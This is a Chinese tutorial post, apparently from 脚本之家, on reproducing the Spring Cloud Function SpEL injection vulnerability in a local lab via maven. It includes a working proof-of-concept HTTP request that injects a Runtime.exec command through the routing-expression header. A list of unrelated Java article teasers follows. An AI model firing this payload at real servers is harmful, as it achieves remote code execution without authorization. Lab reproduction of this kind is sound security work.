Spring-Cloud-Function-Spel 漏洞环境搭建
1、漏洞环境搭建
由于漏洞出现在前两天,原本等待vulhub出环境,直接docker 一键就ok了。但是这次vulhub好像不太及时。对于自己只能自己搭建环境了。
找了许久,终于在唐大佬的github中找到几乎一键的方法。
参考链接:https://github.com/tangxiaofeng7/Spring-Cloud-Function-Spel 这里放原始链接以表示尊重。
无法上github的话,私信我。
搭建方法很简单,先安装maven jdk 等。大佬是jdk17 我本地下载最新版本18 也是ok
方法如下:下载代码后,在解压目录cmd执行 mvn spring-boot:run 会下载很多库,需要耐心等待。成功后会开启8080 端口。
漏洞poc极其简单:
路径最好使用funtionRouter,原因自查。此环境倒是任意路径都ok。
POST /functionRouter HTTP/1.1
Host: 192.168.1.7:8080
spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec("calc.exe")
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
漏洞验证:
到此这篇关于Spring-Cloud-Function-Spel 漏洞复现的文章就介绍到这了,更多相关Spring-Cloud-Function-Spel 漏洞内容请搜索脚本之家以前的文章或继续浏览下面的相关文章希望大家以后多多支持脚本之家!
相关文章
这篇文章主要为大家详细介绍了MyEclipse开发一个webservice接口,具有一定的参考价值,感兴趣的小伙伴们可以参考一下2017-07-07
当需要一个定时发布系统通告的功能,如何实现? 当支付超时,订单自动取消,如何实现?其实这些问题本质都是延时任务的实现,本文为大家盘点了多种常见的延时任务实现方法,希望对大家有所帮助2022-12-12
这篇文章主要介绍了Java事件机制要素及实例详解,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友可以参考下2020-04-04
对于 ThreadLocal 我们都不陌生,它的作用如同它的名字用于存放线程本地变量,这篇文章主要介绍了为什么 ThreadLocal 可以做到线程隔离,需要的朋友可以参考下2022-07-07
解决SpringBoot启动过后不能访问jsp页面的问题(超详细)
这篇文章主要介绍了解决SpringBoot启动过后不能访问jsp页面的问题,文中通过示例代码介绍的非常详细,有需要的朋友可以参考一下,希望对你有所帮助。2020-05-05
这篇文章主要为大家详细介绍了Java图形界面开发之简易记事本的制作方法,,具有一定的参考价值,感兴趣的小伙伴们可以参考一下2016-10-10
本文主要介绍了Java中ArrayList线程不安全怎么办,主要有三种解决的方法,文中通过示例代码介绍的非常详细,具有一定的参考价值,感兴趣的小伙伴们可以参考一下2021-08-08
idea插件之如何使用JarEditor编辑Java JAR文件
JarEditor是一款用于在IntelliJIDEA中直接编辑JAR文件的插件,支持反编译查看和编辑.class文件,并提供即时编译与保存功能,通过JarEditor,用户可以在IDE内一站式完成JAR文件的编辑、管理和打包操作,提高开发效率,但在生产环境中使用前,请确保备份并测试修改2025-01-01
这篇文章主要为大家详细介绍了java简单实现计算器,文中示例代码介绍的非常详细,具有一定的参考价值,感兴趣的小伙伴们可以参考一下2020-12-12
Java数据库连接池之c3p0简介_动力节点Java学院整理
这篇文章主要为大家详细介绍了Java数据库连接池之c3p0简介的相关资料,具有一定的参考价值,感兴趣的小伙伴们可以参考一下2017-08-08
最新评论